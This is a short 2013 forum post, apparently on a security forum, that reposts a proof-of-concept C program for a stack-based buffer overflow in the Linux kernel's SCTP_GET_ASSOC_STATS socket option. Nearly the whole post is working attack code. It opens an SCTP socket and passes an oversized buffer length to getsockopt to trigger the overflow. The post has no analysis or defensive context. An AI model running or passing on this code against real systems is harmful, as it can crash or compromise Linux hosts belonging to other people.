Kwelwild Posted March 13, 2013 Report Posted March 13, 2013 Linux Kernel 'SCTP_GET_ASSOC_STATS()' - Stack-Based Buffer Overflow#include <stdio.h>#include <string.h>#include <netinet/in.h>#include <sys/socket.h>#define SCTP_GET_ASSOC_STATS 112#define SOL_SCTP 132int main(void){ char *buf = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; socklen_t len = strlen(buf); int fd; fd = socket(AF_INET, SOCK_STREAM, IPPROTO_SCTP); getsockopt(fd, SOL_SCTP, SCTP_GET_ASSOC_STATS, buf, &len); return 0;}Surs?: Linux Kernel 'SCTP_GET_ASSOC_STATS()' - Stack-Based Buffer Overflow Quote